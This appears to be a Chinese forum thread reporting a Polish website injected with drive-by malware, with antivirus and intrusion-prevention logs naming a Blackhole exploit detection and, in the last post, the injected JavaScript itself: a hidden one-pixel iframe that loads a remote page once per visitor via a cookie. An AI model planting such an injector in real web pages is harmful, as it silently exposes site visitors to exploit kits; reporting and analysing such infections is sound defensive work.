http://e.hydro-eko.tychy.pl/【挂马BY哀酱】

墨家小子

2013/5/8        17:50:40        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G2NRS8WE\e_hydro-eko_tychy_pl[1].htm        JS/Exploit-Blacole.ht (特洛伊)

Tom179090

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/5/8 星期三 17:57:52,高,阻止了 e.hydro-eko.tychy.pl 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 5,不需要操作,不需要操作,"e.hydro-eko.tychy.pl (85.128.146.232, 80)",e.hydro-eko.tychy.pl/,"TOM (192.168.1.14, 65480)",85.128.146.232 (85.128.146.232),"TCP, www-http"
来自 <b>e.hydro-eko.tychy.pl/</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

哀酱俏佳人

function zzzfff(){
  var tenk = document.createElement('iframe');
  tenk.src = 'http://bahamabob.com/clk.php';
  tenk.style.position = 'absolute';
  tenk.style.border = '0';
  tenk.style.height = '1px';
  tenk.style.width = '1px';
  tenk.style.left = '1px';
  tenk.style.top = '1px';
  if (!document.getElementById('tenk')){
    document.write('<div id=\'tenk\'></div>');
    document.getElementById('tenk').appendChild(tenk);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}